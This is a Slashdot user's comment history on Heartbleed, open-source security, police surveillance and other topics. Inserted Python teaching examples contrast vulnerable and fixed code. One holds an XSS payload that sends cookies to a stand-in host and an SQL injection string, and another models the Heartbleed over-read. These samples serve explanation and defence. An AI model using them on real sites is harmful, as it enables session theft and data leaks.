Comments

How Does Heartbleed Alter the 'Open Source Is Safer' Discussion?

hawguy Re:NSA (527 comments)

The huge problem with OSS is that if no one takes the responsibility to do a good code audit for a project, the NSA will do that independently, file the found exploits, and tell nobody.

Of course, the flip side is that if you *want* to do a good code audit for software you're using, you can do it on your own with open source software (and you can review code changes in patches before applying them). However, with closed source software, you can (usually) only take the word of the closed source company and have to trust that they haven't purposely inserted back doors into the code.

And once one company does the audit, they can share it with others (or a group of companies could share the costs of the audit), and all users, no matter how large or small, can validate that the code they are running matches the audited code.

Of course, an audit isn't a guarantee of finding a bug (which is just as true for closed source software as it is for open source software), but at least with open source code, a company that finds a bug can choose to fix it immediately without waiting for it to filter through a large company's release process.

2 days ago
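
A worked version of the "validate that the code you are running matches the audited code" step, added here as an example (Python; not code from the thread or from any project it mentions): it hashes every file in a source tree and compares the result against an audited manifest, reporting modified, missing and unexpected files. The manifest format (relative path, two spaces, SHA-256 hex digest, one per line), the sample tree and the tampering are this example's own assumptions; paths are assumed not to contain whitespace.

```python
"""Check that a source tree matches an audited manifest before building it.

Added example, not code from the Slashdot thread. The manifest format
(relative path, two spaces, SHA-256 hex, one entry per line) is an assumption
made for this example; the tree and manifest are constructed in a temp dir.
"""
import hashlib
import os
import tempfile


def sha256_file(path, chunk=65536):
    """Stream a file through SHA-256 so large sources need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def tree_digests(root):
    """Map every regular file under root (relative, slash-separated) to its digest."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = sha256_file(full)
    return out


def parse_manifest(text):
    """Parse 'path  digest' lines; blank lines and '#' comments are ignored."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        path, digest = line.rsplit(None, 1)   # assumption: no whitespace in paths
        entries[path] = digest.lower()
    return entries


def verify_tree(root, manifest_text):
    """Compare the tree against the audited manifest.

    Returns (ok, findings); findings lists ('modified'|'missing'|'unexpected', path).
    Any finding means you are not running the audited code. An extra file is as
    serious as a changed one, since build scripts pick up whatever is in the tree.
    """
    expected = parse_manifest(manifest_text)
    actual = tree_digests(root)
    findings = []
    for path, digest in expected.items():
        if path not in actual:
            findings.append(("missing", path))
        elif actual[path] != digest:
            findings.append(("modified", path))
    for path in actual:
        if path not in expected:
            findings.append(("unexpected", path))
    findings.sort()
    return (not findings, findings)


def demo():
    """Constructed example: an audited two-file tree, then one file tampered with."""
    root = tempfile.mkdtemp()
    files = {
        "src/main.c": b"int main(void) { return 0; }\n",
        "include/config.h": b"#define VERSION 1\n",
    }
    for rel, data in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    manifest = "\n".join("%s  %s" % (p, hashlib.sha256(d).hexdigest())
                         for p, d in files.items())
    clean = verify_tree(root, manifest)
    # Simulate an unreviewed change slipping into the tree after the audit.
    with open(os.path.join(root, "src/main.c"), "ab") as f:
        f.write(b"/* unreviewed change */\n")
    tampered = verify_tree(root, manifest)
    return clean, tampered


if __name__ == "__main__":
    print(demo())
```

The manifest itself has to come from the auditor over a channel you trust (signed, or fetched from the auditor directly); a manifest shipped alongside the tarball by the same party that could have altered the tarball proves nothing.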

The Security of Popular Programming Languages

hawguy How does a language remediate anything? (183 comments)

I don't understand this:

Perl remediates 85% of all Cross-Site Scripting vulnerabilities, the highest rate among all languages but only 18% of SQL Injection.

There is no Perl language support to remediate cross site scripting. That's all done by the developer and/or framework he's using, so I don't see how it's useful to say that Perl remediates 85% of XSS vulnerabilities when the language itself has no idea what XSS is or how to remediate it.

I'm also having trouble reconciling this statement:

Perl has an observed rate of 67% Cross-Site Scripting vulnerabilities, over 17% more than any other language.

So Perl remediates 85% of XSS vulnerabilities -- the highest rate of any language, yet it has a 17% higher rate of XSS vulnerabilities?

This study would be slightly more useful if they gave details on web frameworks instead of just languages.

I'm surprised Ruby and Python didn't make the list, I figured that either one of those languages would be more popular than Perl for web development today.

2 days ago
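
To make the point concrete, here is an added example (Python rather than Perl, since the point does not depend on the language; not code from the study or from the thread) showing that the language does nothing about either bug: the same interpreter runs the vulnerable and the remediated version of a page render and a database lookup, and the difference is entirely in whether the developer encodes output for its HTML context and binds query parameters. The profile page, the users table and the two payloads are constructed for the example.

```python
"""XSS and SQL injection are remediated by the code that builds output and
queries, not by the language. Added example (Python standing in for the Perl
in the study); the profile page, users table and payloads are constructed.
"""
import html
import sqlite3

# Constructed attacker inputs.
PAYLOAD_XSS = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
PAYLOAD_SQLI = "' OR '1'='1"


def render_profile_unsafe(display_name):
    """Vulnerable: untrusted input is interpolated into HTML verbatim."""
    return "<h1>Welcome, %s</h1>" % display_name


def render_profile_safe(display_name):
    """Remediated: output encoding for an HTML text node (a framework's
    auto-escaping template does exactly this for you)."""
    return "<h1>Welcome, %s</h1>" % html.escape(display_name, quote=True)


def contains_script_tag(rendered):
    """Did a tag from the input survive as a tag in the rendered page?"""
    return "<script>" in rendered


def make_db():
    """Constructed in-memory table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.org"), ("bob", "bob@example.org")])
    return conn


def lookup_unsafe(conn, name):
    """Vulnerable: string-built SQL; the quote in the payload closes the literal."""
    sql = "SELECT email FROM users WHERE name = '%s' ORDER BY name" % name
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """Remediated: bound parameter; the value can never become SQL syntax."""
    rows = conn.execute("SELECT email FROM users WHERE name = ? ORDER BY name", (name,))
    return [row[0] for row in rows]


def demo():
    """Run both payloads through the vulnerable and remediated paths."""
    conn = make_db()
    return {
        "xss_unsafe": contains_script_tag(render_profile_unsafe(PAYLOAD_XSS)),
        "xss_safe": contains_script_tag(render_profile_safe(PAYLOAD_XSS)),
        "sqli_unsafe": lookup_unsafe(conn, PAYLOAD_SQLI),   # leaks every row
        "sqli_safe": lookup_safe(conn, PAYLOAD_SQLI),       # no user has that name
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

This is why a per-language "remediation rate" really measures which frameworks and habits are common among that language's users, not anything the language itself does.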

Climate Scientist: Climate Engineering Might Be the Answer To Warming

hawguy Re:Climate engineering? (338 comments)

Considering this is a non-problem to start with, we'd absolutely be doing more harm than good. This was the most brutal winter I've seen in over 20 years. It seems like every other day I was plowing more global warming off my driveway and we just got another 5" of global warming last night that I had to shovel off my walk.

Why do so many people confuse weather with climate?

2 days ago

Google Buys Drone Maker Titan Aerospace

hawguy Re:Why in the FUCK (41 comments)

would either Google or especially Facebook be buying drone companies? These companies obviously have WAY too much money and are WAY overvalued. I suppose it is smart that rather than wait for the bubble to burst and the share price to crash, wiping out billions in value, they're trying to get stuff that is worth something while they still can. Still, this is actually kind of unsettling to me and makes me wonder if we may be cruising obliviously towards the next tech meltdown, sooner rather than later?

It's alluded to in the summary, and spelled out in TFA - both companies have shown interest in providing internet access in underserved areas through aerial platforms:

Both Ascenta and Titan Aerospace are in the business of high altitude drones, which cruise nearer the edge of the earth’s atmosphere and provide tech that could be integral to blanketing the globe in cheap, omnipresent Internet connectivity to help bring remote areas online. According to the WSJ, Google will be using Titan Aerospace’s expertise and tech to contribute to Project Loon, the balloon-based remote Internet delivery project it’s currently working on along these lines.

...

The main goal, however, is likely spreading the potential reach of Google and its network, which is Facebook’s aim, too. When you saturate your market and you’re among the world’s most wealthy companies, you don’t go into maintenance mode; you build new ones.

2 days ago

GM Names Names, Suspends Two Engineers Over Ignition-Switch Safety

hawguy Why not? (236 comments)

The next time your mail goes down, should we know the name of the guy whose code flaw may have caused that?

Why not let software engineers take responsibility for their work just like "real" engineers do when they sign off on a project?

The developer responsible for the Heartbleed bug that put the privacy of millions of users at risk stood up and took responsibility for his mistake.

If you know that the world is going to hear about it if you screw up, then maybe you'll take a little more time to vet your work before you sign off on it.

5 days ago

NSA Allegedly Exploited Heartbleed

hawguy Re:It's time we own up to this one (149 comments)

It was discovered and fixed so quickly *because* it's open source

For crikessakes, the heartbleed vulnerability existed for over 2 years before being discovered and fixed!

Sorry my bad, that sentence was confusing -- I meant the fix was fast, not finding the bug.

An exact timeline for Heartbleed is hard to find, but it looks like there was some responsible disclosure of the bug to some large parties about a week before public disclosure and release of the fixed SSL library.

In contrast, Apple learned of its SSL vulnerability over a month before they released an iOS patch and even after public disclosure of the bug, it was about a week before they released the OS X patch. And just like the OpenSSL bug, Apple's vulnerability was believed to have been in the wild for about 2 years before detection (of course, since the library code was open-sourced by Apple, several unofficial patches were released before Apple's official patch).

5 days ago

Cost Skyrockets For United States' Share of ITER Fusion Project

hawguy Is that a lot of money? (172 comments)

$4B over 20 years is $200M/year -- does anyone in congress even track such a small amount of money? I bet that if a few congressmen looked under the couch cushions in their office they could find more money than that.

5 days ago

NSA Allegedly Exploited Heartbleed

hawguy Re:It's time we own up to this one (149 comments)

OK guys. We've promoted Open Source for decades. We have to own up to our own problems.

This was a failure in the Open Source process. It is just as likely to happen to closed source software, and more likely to go unrevealed if it does, which is why we aren't already having our heads handed to us.

But we need to look at whether Open Source projects should be providing the world's security without any significant funding to do so.

If it's just as likely to happen to closed source software, then why is it a failure of the Open Source process? It was discovered and fixed so quickly *because* it's open source - there may be similar holes in closed source software that are being exploited today, yet no white hats have discovered them yet.

5 days ago

NSA Allegedly Exploited Heartbleed

hawguy Re:NSA put the bug there, of course they exploited (149 comments)

We need to find out if the author of this bug is or was on the NSA payroll. It would not be surprising to find out he was paid to put it there.

The author responsible for the bug has already admitted that it was a mistake (and it's not like buffer overflows are unheard of, so it really is plausible). Sure, it's possible that the NSA secretly paid him (or even coerced him by holding some incriminating evidence over his head), but it would likely take someone with the resources of the NSA to uncover such a secret NSA payout. Something of that nature probably wouldn't even be available in Snowden's document archive.

5 days ago
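
For readers wondering how small the mistake was, this added example (a Python model, not OpenSSL's code and not anything from the thread) reproduces the logic of the heartbeat bug and of its fix. A TLS heartbeat message is a one-byte type, a 16-bit payload length, the payload, and at least 16 bytes of padding; the responder echoes the payload. The vulnerable path copies as many bytes as the peer claims, the fixed path first checks that the claimed length fits inside the record actually received. The "memory" here is a bytes object standing in for the process heap, and the private-key fragment placed after the request is constructed for the demo.

```python
"""Model of the missing bounds check behind Heartbleed (CVE-2014-0160).

Added example, not OpenSSL code. Heartbeat message layout:
    type(1) | payload_length(2, big-endian) | payload | padding(>=16)
The responder must echo payload_length bytes of payload. The bug: the claimed
length was used for the copy without checking it against the length of the
record received, so the reply carried whatever followed the request in memory.
'memory' below is a bytes object standing in for the heap; the secret placed
after the record is constructed for the demo.
"""
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16


def build_request(payload, claimed_length=None):
    """Encode a heartbeat request; claimed_length lets a malicious peer lie."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def respond_vulnerable(memory, _record_length):
    """Pre-fix behaviour: trust the peer-supplied length; the record length is ignored."""
    _type, claimed = struct.unpack("!BH", memory[:3])
    echoed = memory[3:3 + claimed]          # may run far past the end of the record
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + echoed + b"\x00" * MIN_PADDING


def respond_fixed(memory, record_length):
    """Post-fix behaviour: the claimed payload must fit inside the received record."""
    if 1 + 2 + MIN_PADDING > record_length:
        return None                          # too short to carry any payload at all
    _type, claimed = struct.unpack("!BH", memory[:3])
    if 1 + 2 + claimed + MIN_PADDING > record_length:
        return None                          # silently discard, as the fix does
    echoed = memory[3:3 + claimed]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + echoed + b"\x00" * MIN_PADDING


def leaked_bytes(response, claimed):
    """Payload portion of a response, i.e. what the peer gets back."""
    return response[3:3 + claimed]


def demo():
    """Constructed: a 4-byte payload that claims 64, with key material right behind it."""
    secret = b"-----BEGIN RSA PRIVATE KEY-----MIIEowIBAAKCAQ"   # constructed, not a real key
    request = build_request(b"ping", claimed_length=64)
    memory = request + secret                # the heap happens to hold the secret next
    vuln = respond_vulnerable(memory, len(request))
    fixed = respond_fixed(memory, len(request))
    return leaked_bytes(vuln, 64), fixed


if __name__ == "__main__":
    leak, fixed = demo()
    print("vulnerable echoed:", leak)
    print("fixed response:", fixed)
```

The difference between the two responders is a single comparison of a peer-controlled length against the real record length, which is exactly the kind of line that a reviewer skims past.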

Seven Habits of Highly Effective Unix Admins

hawguy Re:Rebooting is not a fix (136 comments)

Bullshit. Windows admins are not trained to reboot when there is a problem

It's amusing that in the post right before yours (and not an AC like you), a Windows Admin explained why he does reboot first:

Because in the Windows world, I usually don't have the luxury of digging into the kernel's or driver's source code to figure out exactly why it has stopped behaving correctly

5 days ago

Seven Habits of Highly Effective Unix Admins

hawguy Rebooting is not a fix (136 comments)

As someone who's managed a team of sysadmins that moved to the Linux world from Windows, I have this tip: "Reboot does not fix anything, it just hides things".

For some reason, Windows admins have been trained to reboot immediately when things don't work well rather than to figure out why something is failing. I'm sure this was a valid "fix" in older versions of Windows, but Windows has been stable for quite some time, and things shouldn't mysteriously stop working for no reason. Take a bit of time to figure out *why* the CPU is suddenly spiking on the database server, since if you reboot it, you will have lost most of the evidence for why it's happening, and it's likely to happen again. If it's a production server and you can't spend much time, run a few diagnostics (ps, "top", lsof, etc) and save to a file for the postmortem, but don't just go in and reboot before looking around.

5 days ago
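
A capture step of the kind the comment suggests, as an added example (Python; not from the thread): it runs a set of diagnostics, saves each one's output into a timestamped directory, and records which commands were missing or failed instead of aborting, so the bundle is still useful on a minimal box. The command list and the directory layout are this example's own choices, and every command assumed here is a standard Linux tool.

```python
"""Snapshot volatile state before a reboot destroys it.

Added example; the command list and bundle layout are this example's choices.
Commands that are not installed or that hang are recorded as errors so that
one missing tool does not cost you the rest of the evidence.
"""
import datetime
import os
import shutil
import subprocess
import tempfile

DEFAULT_COMMANDS = {
    "ps": ["ps", "-eo", "pid,ppid,user,%cpu,%mem,stat,etime,args", "--sort=-%cpu"],
    "top": ["top", "-b", "-n", "1"],
    "lsof": ["lsof", "-nP"],
    "ss": ["ss", "-tunap"],
    "dmesg": ["dmesg", "-T"],
}


def run_capture(argv, timeout=30):
    """Run one diagnostic; return (ok, text). Never raises."""
    if shutil.which(argv[0]) is None:
        return False, "%s: not installed\n" % argv[0]
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return False, "%s: timed out after %ds\n" % (argv[0], timeout)
    return proc.returncode == 0, proc.stdout + proc.stderr


def collect(commands=DEFAULT_COMMANDS, dest=None):
    """Write each command's output to dest/<name>.txt; return (dest, summary)."""
    stamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    dest = dest or os.path.join(tempfile.gettempdir(), "pre-reboot-%s" % stamp)
    os.makedirs(dest, exist_ok=True)
    summary = {}
    for name, argv in commands.items():
        ok, text = run_capture(argv)
        path = os.path.join(dest, name + ".txt")
        with open(path, "w") as f:
            f.write("# captured %s\n# %s\n" % (stamp, " ".join(argv)))
            f.write(text)
        summary[name] = {"ok": ok, "path": path, "bytes": len(text)}
    return dest, summary


if __name__ == "__main__":
    where, result = collect()
    for name, info in sorted(result.items()):
        print("%-6s %s %s" % (name, "ok " if info["ok"] else "ERR", info["path"]))
    print("bundle:", where)
```

Copy the bundle off the box before rebooting; if the problem turns out to be an intrusion rather than a fault, those files are also the first thing the incident responder will ask for.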

NYC Considers Google Glass For Restaurant Inspections

hawguy Re:Why not just use a video camera? (104 comments)

They have solved this problem, it's called a camcorder.

I was thinking the same thing -- they can use a GoPro if they want something rugged, and with a handheld camera the inspector doesn't have to lay down on the floor to shoot footage of the filth underneath the stove.

5 days ago

Michael Bloomberg: You Can't Teach a Coal Miner To Code

hawguy Why does it have to be "coding"? (578 comments)

There's no reason to train every worker to "code", we don't suffer from a lack of coders, we suffer from a lack of "developers", and no 6 week software bootcamp is going to turn someone with no programming experience into a developer. Besides, the average coal miner is probably not going to want to sit in front of a computer all day (many in my family work in the heavy construction industry, and I am 100% certain that although you could probably teach my brother to code, you're not going to be able to teach him to sit behind a desk all day).

But there are plenty of other jobs that you *could* teach a former coal miner to do -- not everyone in the economy needs to be a coder any more than everyone needs to be an auto mechanic just because we all (well, mostly) drive cars.

5 days ago

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Convenient malfunctions (322 comments)

The WTOP article drops the story in 2007.

http://en.wikipedia.org/wiki/A...
http://www.washingtonpost.com/...

The Wikipedia article tells us that the case went to court -- you know, like when you feel you've been wronged, and you put the people who wronged you on trial, and the thing is judged by a jury of your peers (normal people not cops), and the jury awarded $5,000 in damages -- the size of some medical bills.

A jury -- of normal people -- thought, after getting much more insight into this case than you or I, that the cops were a little rough on her, and nothing more.

It seems like that's the problem -- the evidence that should have proved her story was non-existent because *seven* police cameras (cameras that we all paid for with our taxes and were *required* to be running due to a settlement with the DoJ) somehow malfunctioned and did not capture any video. How many cameras do you think would have malfunctioned if they backed up the story of the police? All the jury had to go on was her testimony and the testimony of 7+ police officers. I wonder if anyone involved had any vested interest in lying about the events?

Finally, the case is nearly A DECADE OLD.

What's next? Some cases where a firehose got turned on the colored in Mississippi?

7 years ago doesn't seem like that long ago, but are you really holding up past discrimination against blacks by those in authority as a good example of why the past doesn't matter?

about a week ago

Raspberry Pi's Eben Upton: How We're Turning Everyone Into DIY Hackers

hawguy Re:Am I getting old? (90 comments)

I'm 54 this year. I love playing with my Pi.

I'm almost as old as you and I've been playing with my pi since my early teens. I still play with it from time to time.

But when did they start calling it a "pi"?

about a week ago

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Convenient malfunctions (322 comments)

Anyone remember the police beating case in Maryland where the dash cams of ALL SEVEN police cars on the scene simultaneously malfunctioned?

No ... and a Google search turns up nothing. Can you provide a reference?

Here's a reference:

http://www.wtop.com/?nid=428&s...

Seven cars responded, all required to have dashcams, yet somehow no dashcam footage of the incident was available.

And here's an article with links to other cases where police video disappeared:

http://www.theagitator.com/201...

And I found it with my first Google search for

about a week ago

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Should be punished (322 comments)

Apart from that there is no reason to go hard on the police officers. There is a simple social solution when problems like this arise.
Split them up. It works on bullies, criminal gangs and neo-nazis.

Relocate them to cities that don't have this problem and make sure that none of them work with each other.
Once they are partnered up with honest people and only honest people the undesired behavior will go away.
After a couple of years they can be brought back.

That way the problem disappears without the need to break necks or even prove anything.

-- methane-fueled

Putting even the most honest and trustworthy people into a system of power doesn't guarantee that there will be no abuses -- even honest people abuse their power.

But knowing that someone is looking over your shoulder at all times with surveillance *can* reduce abuses since a cop can't claim "He threatened me!" if no threat was captured on the surveillance device.

about a week ago

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Easy fix (322 comments)

Just deduct the repair bill from their pay. They'll soon start working.

Seems like it would be more effective if judges held police responsible for proper functioning of their recording devices, and gave the benefit of the doubt to those that accuse the police of wrongdoing when the mandated surveillance equipment that could prove the allegations was mysteriously "out of order".

about a week ago

Isolated Tribes Die Shortly After We Meet Them

hawguy Weren't they already dying? (351 comments)

Weren't they already in serious decline before being visited?

That first graph shows a lot larger average population before year 0 (the year of contact), which slowly grows in the 20 years after contact.

http://www.nature.com/srep/201...

The original article seems to confirm this:

http://www.nature.com/srep/201...

Estimates of population sizes before sustained peaceful contact (n = 22, recorded an average of 45 years before contact, range 1–106) were on average 5.5 times larger than populations at contact ...

So if populations were 5 times higher before any contact at all, why do they blame the contact for population declines?

about a week ago

Smart Car Tipping Trending In San Francisco

hawguy Re:San Fran = the new Detroit (369 comments)

Or maybe they *do* like smart cars, and just find tipping them amusing. I've never heard it suggested that cow-tipping was motivated by any particular dislike for cows or farmers. And with a bit of alcohol (or asshole) in their systems a bunch of bemused people might not even consider the damage done. For that matter was any real damage done? The things have roll cages, and I don't recall seeing any broken headlights, etc. in the photos. I'm sure some people will cite the horrible expense of scratches in the paint, but in terms of mechanical damage all I can think of is possibly draining some of the fluids into places they shouldn't be. And I don't think a car has anything half so prone to orientation damage as a refrigerator - and that's easy enough to fix with a flush and recharge.

Why do you discount the cost of the bodywork? Isn't that still damage? The roll cage isn't there to prevent damage, it's there to prevent the roof from being crushed in a rollover accident. Someone once keyed the side of my car and tore the driver's door handle off in an attempt to break in. It cost $4500 to replace the door and repaint that side of the car - the car itself was only worth around $7000, so it was close to being totaled. A smart car is smaller so the bodywork repairs might cost a bit less, but popping out or replacing the side body panels that were on the ground (sidewalks in SF are made of hard concrete, not of fluffy pillows as they apparently are where you live) and repainting it is still going to be in the thousands. So each car owner is probably going to be out $500 - $1000 or whatever their insurance deductible is, plus whatever amount their insurance increases after they make a claim.

Besides, have drunks ever successfully tipped over a cow? There seems to be a lot of debate about whether or not cow tipping is a real thing, and little evidence that it's real: https://www.google.com/search?...

about a week ago

Submissions


Network Solutions hit with DDOS attack

hawguy hawguy writes  |  about 8 months ago

hawguy (1600213) writes "As reported by TechZone 360 as well as a number of blogs and tweets, Network Solutions experienced a DDOS attack today, knocking out DNS resolution for thousands of hosts.

Things are improving on the DNS side, but their website is still having problems. They've apparently posted a message about the outage on their website, but I've been unable to load the page.

They posted a brief message on their Facebook page:

Network Solutions is experiencing a Distributed Denial of Service (DDOS) attack that is impacting our customers as well as the Network Solutions site. Our technology team is working to mitigate the situation. Please check back for updates."

Facebook takes on Google with graph search

hawguy hawguy writes  |  about a year ago

hawguy (1600213) writes "As reported by CNET:

Facebook chief executive Mark Zuckerberg announced Graph Search at a press event today at the company's Menlo Park headquarters, billing it as a new way to find people, photos, places and interests that are most relevant to Facebook users.

Graph Search is the social network's response to its massive base of 1 billion users, 240 billion photos, and 1 trillion connections. The tool is meant to provide people the answers to their questions about people, photos, places, and interests.

Does anyone have any opinions on FB's latest product?"


Who is WirelessForAmerica?

hawguy hawguy writes  |  more than 2 years ago

hawguy (1600213) writes "I came across a video for WirelessForAmerica today:

http://www.youtube.com/watch?v=HyyDIk8W6Kw

It warns of an impending wireless spectrum shortage (only 24 months until the disaster hits!), and how they have just the answer, but of course it's being derailed by special interests.

It came off as a pure political video — warning of an impending disaster if nothing is done, their solution uses American Ingenuity, will create jobs, etc.

So what's the real story behind WirelessForAmerica? Are we running out of mobile bandwidth? Is their solution really the best alternative? From what I've gleaned from their WirelessForAmerica.org website, they want to use frequencies that are so close to existing GPS frequencies that nearly all existing GPS receivers would need to be replaced and future receivers would need to be designed to better reject neighboring frequencies."


Power grid change may disrupt clocks

hawguy hawguy writes  |  more than 2 years ago

hawguy (1600213) writes "A yearlong experiment with the nation's electric grid could mess up traffic lights, security systems and some computers — and make plug-in clocks and appliances like programmable coffeemakers run up to 20 minutes fast."

Journals

hawguy has no journal entries.
